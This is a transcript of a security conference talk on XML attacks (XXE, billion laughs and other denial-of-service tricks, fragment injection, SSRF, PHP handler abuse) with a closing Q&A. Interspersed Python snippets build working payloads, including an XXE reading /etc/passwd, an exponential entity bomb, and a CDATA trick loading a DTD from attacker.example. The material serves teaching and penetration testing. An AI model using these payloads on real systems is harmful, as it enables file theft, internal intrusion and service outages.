
Hi everyone, my topic today is XML attacks, the boring and the lost methods. In recent years a lot of XML-related problems have come to light. I think this is partly because the most recent OWASP Top 10 contains XXE, and sadly a lot of applications are tested only against this list. Including this vulnerability is great, but there is room for improvement in the way we test for it. In the following few minutes I will try to share some information to help with that improvement. The methods and techniques shared here are not the result of my greatness, but forgotten or under-used past discoveries. This is because, as I
started to dive deep into the topic a while ago, I realized that most of the areas I was facing were already documented, and sadly rarely used. I hope this talk will improve on that. We will see that testing is far more interesting than just fetching the /etc/passwd file after a successful attack. I hope that the majority of us will apply some of these tips in the future, for example in a bug bounty program. As some introduction is always mandatory: I am Mark Moodley, and I love to teach and make systems better, but I would rather not waste time
on myself. If anyone is interested in having a chat with me, I am happy to do so, but please wait until the end of the talk; my email address will be shared there, if you are still not convinced to avoid me. A quick shout-out to the guys at the Hungarian podcast called Hackish Language: one of the main reasons I am giving this talk is that they had a great episode with Otila Morochi, I guess, which gave me the motivation to do this. But do not blame them if my performance is not top notch or the topic is evident to everyone. And by the
way, at the end I will reveal the underlying reason for Yoda's unusual speech patterns. That was way more than I wanted to say about myself, so let's get to the content itself.

History. I know this isn't anyone's favorite topic, but as the online nature of the conference prevents me from getting feedback on the age of the audience, I think it is better to mention some artifacts from the past that we still carry today. I was lucky or unlucky enough, depending on your point of view, to see the Hungarian internet and web grow and evolve into, well, something, slowly catching up with the global leaders or standards
of the web, I hope. From that journey there are some points to take with us, I think.
So let's talk about the origins. In case we have not heard about it, SGML is a framework that helps us describe markup languages, like the hopefully well-known HTML, and XML as well. Some of us may still remember the not-so-good old days when the sites we visited could not be displayed as intended, and there was a kind of anarchy in how things were interpreted and implemented. I think all of this was rooted deeply in the markup language itself, I mean HTML in its early versions, before 4.0 I think. But we are still using these versions of this
language, so we still carry these legacies. Not only was the user experience questionable; because of this nature of HTML, more mechanical, architectural and reliability problems arose from the ambiguity. There was actually a case when a Hungarian web developer forum, Weblabor (yes, that was way before Stack Overflow), had a post where the most accepted answer suggested implementing price management based on exchange rates scraped from a big bank's website. The example provided was basically a regular expression. It worked just because the HTML had not changed in a while. Everyone seemed to be happy and things were all right, I guess, until one day,
as all tales start, the bank redesigned its web page. As you can imagine, all hell broke loose: some web shops were offering items priced at a really customer-friendly zero Hungarian forints. The better implemented ones basically said that no item was purchasable at the moment. That was quite a mess. The wholesome part of the story is that the bank helped out the developers: it put the old HTML structure back for a while to give the developers time to adapt to an officially supported interface, as far as I remember. I hope that this little tale
highlights the necessity of having documents that are well-formed, of retiring regular expressions as a way to get information from sites, and of course of verifying or validating the structure of documents against some kind of description as well. Those were, I guess, the first drivers for creating XML. I think it is one of the seven wonders of the modern day: XML was so well designed that in the past 25 years or so there has been no hard need to redesign it completely. I think UTF-8 is the standard that could be a competitor for it, at least, but character encodings and the hacking around them
is a whole other topic in itself; that would be a great talk, and maybe I will present it later. But back to the topic. Later, as the internet user base was growing and everyone wanted sites to look and feel the same in each and every browser, the World Wide Web Consortium asked what to do and how to solve this problem. Their reasoning was roughly: we kind of like XML, we kind of like HTML, so they came up with XHTML, which basically nobody likes. I never understood why anyone would think that developers would start to write good markup
language based documents and create, well, good sites, when they could continue with the crappy solutions of the past because of backwards compatibility. And that was another point where XHTML failed miserably, because it provided zero backwards compatibility. XHTML actually died, but our beloved XML prevailed. Don't get me wrong, I really like to use XML itself, but I think we are using it really wrong. The tool is not bad; we are just misusing it.

So why is XML so interesting at a hacker conference? As one of the best, if not the best, constructed markup languages in history, it is used in a lot of
specifications and standards, and even its handling is standardized. So if we can exploit a behavior on one site, we can basically exploit it regardless of what language the site is implemented in. I do not want to bore anyone with more history, although I really like how it turned out; from now on I would like to restrict myself to technical details and solutions. So let's jump to what is, I guess, the best-known XML attack: the XML external entity attack. Previously I mentioned that there was a driving force: we wanted to validate our documents, meaning that we want to ensure that the
structure is a predefined one, for example. This is done mostly in two ways: one is the document type definition, a.k.a. DTD, and the other is the XML Schema Definition. Both could be abused, and this talk will focus on the DTD part. So what is the best-known attack on XML? I would really love to see, by a show of hands, how many of us are comfortable with DTD, but I assume a quick summary is not against anyone's will; of course the online nature prevents me from asking, so I need to go through this part as well. In the XML document we can create a section, or reference an external document as well,
which is used to validate the structure of the markup: data types, how the tags relate to each other, and so on. The document is also required to be well-formed, so the DTD check can be done after the document has been checked for well-formedness. We are able to do a lot of things here: besides the document model, we can also create entities. Those can be simple text ones, and there is a little extra which most of the attacks rely on. So behold the external entity. For a long time I had no idea why
anyone in their right mind would design something like that, but as I was researching this I came across some applications that used this technology to store environment-specific variables. So I think it could be okay, but only as an additional feature. I mentioned the Hackish Language guys; they were one reason why I am giving this talk. The second reason is that I really like to play CTF, and by that I do not exclusively mean the Unreal Tournament game mode but also the IT security competitions. Sadly I do not have a lot of time to do so, so I'm always a bit disappointed
when an XXE challenge is marked hard and the solution is basically the same as this little example on the screen. Of course it is dressed up differently every time, but it is still kind of a letdown for me when the challenge itself is five lines and that's all. And I want to make another shout-out to the Hungarian participants: please play CTF games, join ctftime.org and play. I am the only semi-active member of the hardcore iit team, which has not participated in a challenge in something like three months this year, so there were like two active months
when we played, and we are still placed fifth, I think, in Hungary. So shame on us all: join in and let's play some CTFs.

Okay, on to the second best-known XML-based attack, I think, and that is denial of service. I am sure most of us have heard about one really famous example, but let's explore this particular topic a little more. In a denial-of-service attack we can basically aim for three different things. These are the most valuable resources in a computer, and they are
memory, CPU and network. Sadly most bug bounty programs forbid these attacks, but I have seen some progress in recent months, so I hope that in the future we will be able to use some real but forgotten techniques here. When I said that there is a well-known XML DoS attack, probably most of the audience thought about some kind of resource or memory overloading, which is nothing else than the billion laughs attack. The only requirement for this attack is that internal entity processing in the DTD must be enabled. It is really one of the cheapest ways to DoS a given service, as it requires
basically only a few lines of input, and its effects are quite remarkable. The example we can see consumes about three gigabytes of memory, and this can be scaled up by changing either the contents of the lowest entity or the depth of the nesting. It is quite an interesting one: it relies on exponential entity expansion, it consumes a lot of memory that the application may need, and it ties up a huge amount of processing power to do so. It is called billion laughs because this little "lol", or laugh out loud, part is repeated, I think, 10 to the
power of nine times. Yes, 10 to the power of nine; I do not want to confuse it with the long-scale billion, which is 10 to the power of 12, I guess. So yes, the billion laughs attack. But let's not just hate XML: if someone is happy that they are using YAML for configuration files, I have some bad news for them as well, as the attack is possible in some scenarios there too. Sorry for getting off track; back to the memory-based attacks. What if we do not have the luxury of the DTD being enabled for a document?
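To put numbers on the billion laughs growth described above, here is a minimal Python sketch that builds the payload and computes its expanded size arithmetically instead of parsing it. The function names and the `lolz` root element are illustrative assumptions, not taken from the slides; the defaults (nine levels, ten references per level, a three-byte seed) follow the 10 to the power of nine figure and the roughly three gigabytes mentioned in the talk.

```python
import xml.etree.ElementTree as ET


def build_billion_laughs(levels=9, fanout=10, seed="lol"):
    """Build a nested-entity document; each level references the previous one `fanout` times."""
    entities = [f'<!ENTITY lol "{seed}">']
    previous = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        references = f"&{previous};" * fanout
        entities.append(f'<!ENTITY {name} "{references}">')
        previous = name
    dtd = "\n  ".join(entities)
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE lolz [\n  {dtd}\n]>\n"
        f"<lolz>&{previous};</lolz>"
    )


def expanded_size(levels=9, fanout=10, seed="lol"):
    """Number of characters the root element holds after full expansion."""
    return len(seed) * fanout ** levels


def expand_small(levels, fanout, seed="lol"):
    """Really expand a deliberately tiny payload to confirm the arithmetic."""
    return ET.fromstring(build_billion_laughs(levels, fanout, seed)).text


if __name__ == "__main__":
    payload = build_billion_laughs()
    print(f"payload: {len(payload)} characters")
    print(f"expanded: {expanded_size()} characters")
    print(expand_small(levels=2, fanout=3))
```

Only the tiny two-level variant is actually parsed here; the full-size payload is meant for an isolated test target, and recent parser versions may refuse it outright.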
Basically, we have some tricks in our pocket to get through this situation as well and cause some trouble, but those could be way more painful for the attacker to employ, as we need to dedicate more resources to the attack. A lesser-known one is, for example, mega tags. Here the adversary creates a really, really large opening and closing tag, something on the order of megabytes, and sends it as input. This can cause quite surprising failures in a target system, ranging from buffer overflows to simple memory allocation failures.
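A mega tag document needs no DTD at all, which a short Python sketch can show. The function name and the filler character are assumptions made for illustration; the size to use against a real target is a judgment call and is not specified in the talk.

```python
import xml.etree.ElementTree as ET


def build_mega_tag_document(name_length, filler="a"):
    """Return a document whose single element has a tag name `name_length` characters long."""
    if name_length < 1:
        raise ValueError("name_length must be at least 1")
    name = filler * name_length
    return f"<{name}></{name}>"


if __name__ == "__main__":
    # A small instance parses fine locally; a test target would get megabytes.
    small = build_mega_tag_document(1000)
    print(len(small), len(ET.fromstring(small).tag))
    one_mebibyte = build_mega_tag_document(1024 * 1024)
    print(f"{len(one_mebibyte)} characters, no DOCTYPE needed")
```

The name appears twice (opening and closing tag), so the document is a little over twice the requested name length.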
So that's quite an interesting topic. We specifically use the tags and not the data part of the message because for the data most parsers have hard limits: there should be no more than X characters there, and that is how they limit it. But parsers are not so mindful when handling tags, and thus we can take a look around there and cause some trouble. Another good candidate for an attack like that is to aim for the object limit of the parser and stop other necessary objects from being created;
for example, some JVMs (Java virtual machines) have a fairly small hard limit on how many objects can be created or allocated at once by a process. As these objects are live, they cannot be removed by the garbage collector, and the JVM crashes, or could crash. I highly recommend trying these tricks in your next penetration tests and in tests of your own environment. I must admit it is a joy to see the surprise on the local security folks' faces when you are able to stop a service with a single XML file even when the DTD is completely disabled. We really need to talk about the
CPU-targeted exploits as well. A really good candidate for a surprise finding is deeply nested XML, which can cause excessive CPU cycle usage. A couple of thousand nested tags could lead to severe consequences, as it is not easy to use parallelism on them. And when a parser uses recursion, we could create a memory error as well, as the call stack can eat up quite a bit of memory. The next CPU attack is kind of an unusual one; I really like it when we can use other sites and services to achieve something big. If a service is running in a pooled
manner with exclusive locks, we could starve the other threads. By referencing remote, long-distance addresses we are able to slow down the parser and make it wait for a long time, so we can ensure that parsing the XML itself will take quite a while. If we would like to push it even further, we could use our own slow-responding servers. If anyone has heard about the Slowloris attack, we could use something like that, not against the Apache web server but against the XML processing part of an application. This could exhaust the server's connection pool limit as well as the thread limit, so
yes, we could combine it with Slowloris-like behavior. Okay, we really need to say a word about networks. Most parsers do not check the MIME type, so we can reference almost any kind of file to be downloaded as a DTD document. If we think about it, an attacker could basically make the target download four or five Ubuntu ISO images, for example, as DTDs, and that would have quite an impact on application or network performance. Okay, but we really need to get to something that can be used during a bug bounty session,
so I think we should talk about XML fragment injection. I hope everyone is familiar with injection-based attacks like SQL injection and LDAP injection, so let's get familiar with some XML-based ones. I think these attacks are among the most underutilized ones in an XML environment. As almost all injection attacks are related to concatenation to a certain degree, this one has that precondition as well, and it is quite good that a lot of developers are using proper serialization for XML, so these attacks fall more into the trial-and-error category. In a case where we can alter the XML
itself, it is an easy task to add tags to it. I had success in some applications by adding an admin node to, for example, a user registration XML message, and I instantly became admin on the system. It is really unusual, but sometimes it works. A more likely scenario is when some part of the message is concatenated and we can simply add our payload in, for example, a POST data field of a registration or update form. In the case displayed here, we need the parser to tolerate duplicated tags, as we can see that the bio element is duplicated. That does not really work in most of
the cases, but there are some edge cases where it is really useful and fun to exploit. If you take a look at this example, which is a modified version of an actual finding I had in a system, we all know where this is going. A concatenated message like this is really good to exploit in a banking environment: if we craft a specific message to create an additional transaction in the bulk processing, we could basically get a free transfer to our own or another bank account. It is really hard to exploit these, and even with internal knowledge it is
not easy to pull off this kind of attack. But before we discard this kind of attack, I would really like to point out that a lot of incidents are caused by actors who have really deep knowledge of the given system or have got hold of leaked sources and the like. I think that is enough on injection.

Let's explore the next topic, which is server-side request forgery. But why? The XML processing server is most likely to be in an IP zone where a lot of private stuff is available: internal services, status reports, Git-like repositories and so on. That is quite a good target to look for. We can discover internal services
with the previous examples; we just need to swap the file URI for an internal HTTP or HTTPS URL. Later on we are going to talk a little about these kinds of handlers and some specific ones. So it is easy to see that we can get information from different sites. I mentioned Git specifically because you can explore a Git repository using GET requests, which is quite great. Okay, but what happens when we try to reach something that cannot be parsed? In the Swagger Petstore example on swagger.io, the swagger.json file contains special characters that cannot be parsed as XML,
so our XML parser will throw an error for us. Later on we are going to see a demo of that as well. So have we ever heard about CDATA? Basically it is a block that is excluded from interpretation: it tells the XML parser that the following segment of the document is character data, so do not try to parse it. It is quite a good candidate for making this kind of hack work, but there is a problem with it: we cannot simply wrap an entity reference in a CDATA block, because the reference would not be expanded there. For that problem we have a solution that has not been mentioned so far, and here is where the clever part comes in. In the DTD we
are able to create so-called parameter entities, and with their help we will be able to build the CDATA block and get the content of the site as well, without making the parser fail. It is not an easy one; it is a multi-stage exploit, so we have quite a few things to do.

So without further ado I would like to share a demo. In my lab environment I created a small showcase to demo this whole thing. The easiest XML attack, the one that is employed all the time, basically uses this service, which gives us back a simple message
from the server. The attack that we initially discussed, the XXE attack, is as follows.
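The payload shown on screen is not part of the transcript, so the following is only a sketch of the textbook form of the attack, written in Python. The `data` root element, the `xxe` entity name and the `internal.example` host are assumptions. The second function uses the standard library expat binding to list which external resources a document would ask a parser to resolve, without fetching anything.

```python
import xml.parsers.expat


def build_xxe_payload(uri="file:///etc/passwd"):
    """Return a textbook XXE document whose external entity points at `uri`."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{uri}"> ]>\n'
        "<data>&xxe;</data>"
    )


def external_references(document):
    """List the system identifiers the parser is asked to resolve.

    Nothing is loaded: the handler only records the identifier and
    tells expat to carry on.
    """
    seen = []
    parser = xml.parsers.expat.ParserCreate()

    def on_external_entity(context, base, system_id, public_id):
        seen.append(system_id)
        return 1  # non-zero means "continue parsing"

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(document, True)
    return seen


if __name__ == "__main__":
    print(build_xxe_payload())
    # Swapping the file URI for an internal URL turns the same payload into SSRF.
    print(external_references(build_xxe_payload("http://internal.example/status")))
```

A vulnerable service would resolve the identifier and echo the content back inside the `data` element; the helper above only shows that the reference reaches the resolver.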
So we can get the file content; we are using the file handler here. But we would really like to get to this internal website on the other machine, which is the 106, so we can use that service. Imagine that this service is not reachable by us and that it is a computer in a secured zone, for example. We can get the internal site's content, as the source of the internal page is a valid and well-formed document. But what happens when we try to get the swagger.json of the Petstore example from swagger.io? The problem here is that we get an error: the document cannot be
parsed because it contains special characters, for example here. But we would really like to have these kinds of documents: one of the penetration tests I performed involved Swagger documentation similar to this one, but of course on a live production service, and I really wanted to see which APIs I could call, because there are of course GET services that should be available, and as we can see we can clearly receive data from these kinds of services. So we create the example mentioned here, which does not really work: because of the CDATA block we get back the literal xxe entity reference and not the content of the URL that we would really like
to see. So we create another service, which could be, for example, the attacker's server, hosting something along these lines, where we specify what kind of data we really need. Of course this technique can be used on local files containing special characters as well. So we create a malicious document type definition file, reference it from our attacker site, and then reference the "all" entity that was defined there. With that, the special characters should be no problem at all. It takes a while to reach out to swagger.io, but as we can see we are able to pull
this document even though it contains special characters that would normally make XML parsing fail. And in the log we can see that the DTD was fetched as well. As I mentioned earlier, the DTD does not have a .dtd extension and no MIME sniffing is performed, so the .txt extension is valid here as well.
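The demo files themselves are not in the transcript, so here is a hedged Python sketch of the commonly documented form of the CDATA trick. Only the `all` entity name comes from the talk; the `start`, `file`, `end` and `dtd` names, the `data` root element and the `attacker.example` URL are assumptions, and the demo may have split the definitions between the two files differently. The key point is that parameter entities can be combined inside an entity value only in an external DTD, which is why a second, attacker-hosted file is needed.

```python
def build_external_dtd():
    """Content of the attacker-hosted file (any extension, e.g. evil.txt).

    It glues the CDATA opener, the fetched content and the CDATA closer
    into one general entity called `all`.
    """
    return '<!ENTITY all "%start;%file;%end;">'


def build_cdata_document(target_uri, dtd_uri):
    """Document sent to the target: declares the three pieces, then loads the external DTD."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY % start "<![CDATA[">\n'
        f'  <!ENTITY % file SYSTEM "{target_uri}">\n'
        '  <!ENTITY % end "]]>">\n'
        f'  <!ENTITY % dtd SYSTEM "{dtd_uri}">\n'
        "  %dtd;\n"
        "]>\n"
        "<data>&all;</data>"
    )


if __name__ == "__main__":
    print(build_external_dtd())
    print(build_cdata_document(
        "https://petstore.swagger.io/v2/swagger.json",
        "http://attacker.example/evil.txt",
    ))
```

If the fetched content itself contains the sequence `]]>`, the CDATA section ends early and parsing may still fail, which is one of the preconditions worth checking.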
So getting back to our slides, I hope it is understandable now that we can basically get, and by that I mean HTTP GET, almost any internal site and content. I think it is quite a useful trick to employ in any environment. Of course there are preconditions that are necessary for this hack to work, but I think it is still worth a try in most cases.

There is one topic that is worth mentioning, and that is the handlers in XML. I think these are really interesting parts of the XML world. I have mentioned a lot of times how uniform XML is and why it is a great
target to attack, as file, HTTP, HTTPS and FTP are mostly implemented; FTP is rarely enabled, but the first three are pretty much always enabled. But there are special handlers where we can shine and really exploit a targeted system. Most penetration testers are familiar with the PHP-based handler: PHP has a handler, which is also called php, with filters, and this is really great for getting, for example, base64-encoded PHP files and contents from the server. I would like to leave everyone to digest the following handler that PHP has, which is ssh2 tunneling. I have no comments on that.
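Going back to the php handler with filters mentioned above, a small Python sketch can show both halves of the trick: building the payload and decoding what comes back. The `data` root element, the `xxe` entity name and the `index.php` resource are assumptions chosen for illustration. Base64 encoding sidesteps the special-character problem, because the encoded output contains nothing an XML parser would trip over.

```python
import base64


def build_php_filter_payload(resource="index.php"):
    """XXE document asking PHP to base64-encode `resource` before returning it."""
    uri = f"php://filter/convert.base64-encode/resource={resource}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{uri}"> ]>\n'
        "<data>&xxe;</data>"
    )


def decode_leaked_source(b64_text):
    """Turn the base64 text echoed by the target back into readable source."""
    raw = base64.b64decode(b64_text.strip())
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(build_php_filter_payload())
    sample = base64.b64encode(b"<?php echo 1; ?>").decode("ascii")
    print(decode_leaked_source(sample))
```

The sample string in the usage section stands in for a server response; no real response is reproduced here.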
So please do not enable that, like ever, in a PHP environment. I think we all know where this is going: forwarding ports with PHP to external sites because of an XML attack could cause a lot of problems. But a lot of talks are just PHP bashing, and I think there is some trouble elsewhere as well. For example, the Java jar handler can be abused, and we can basically access the contents of a ZIP file on a system. And of course the CDATA hack that we had before can still work here. Binary files are mostly undoable, but text-based ones are mostly okay
with this CDATA hack. I could give a whole talk on this topic by itself, I mean the handlers, but I think it is time to close with something unusual. Quite a while ago a good friend of mine told me that the secret of presentations is not to tell jokes constantly and be funny all the time, but to make sure that in the end everyone has a good laugh. So to close, I took two of the truest or finest XML-based software development truths or dogmas, and, well, let's agree on these two facts. First: we had one problem and we chose to solve it with XML.
Now we have two problems. It is definitely true: try to stay away from XML when possible if no one knows how to use it correctly. It is a great tool, but please, please configure it and disable the features that are not necessary for the given use case. And the second one; as I promised, I have something for the Star Wars fan base: we had one problem and we chose to solve it using multi-threading. Now two problems we have. And I think Yoda approves the last statement. [Laughter] Okay, hopefully there was at least a little grin on everyone's face because of the jokes. I really hope that
we had some new or thought-provoking information in the past few minutes. I believe that we really need to show the world that XML-based services can be exploited in many ways. In case there is any question or criticism, I'd love to get those via email; feel free to contact me. And just a closing fun fact: please never ever use online formatters to beautify your hacking payloads. I was Mark Moodley, and I hope that next year we will meet in real life as well. Take care and enjoy the conference.
Well, thank you, Mark, for the awesome presentation. On the Discord channel we have not seen any questions yet, but this is the time for the audience to ask, so if you have any questions, please just write them in Discord. Until then, Mark, could you please summarize your presentation in a few sentences and highlight the most important parts of it?

Yeah, of course. I'm happy to be here, and honestly I was quite thrilled that my talk made it to the final here. I am glad that everyone was here, and I hope everyone enjoyed it, even the dad jokes. So the key takeaway is from the last
slide: I think we really should use and abuse XML in ways that are not well utilized right now, and I hope that everyone took away some part of the presentation. So hopefully in the next CTF we will have a better understanding and better tasks, on both sides: the CTF organizers and the participants as well.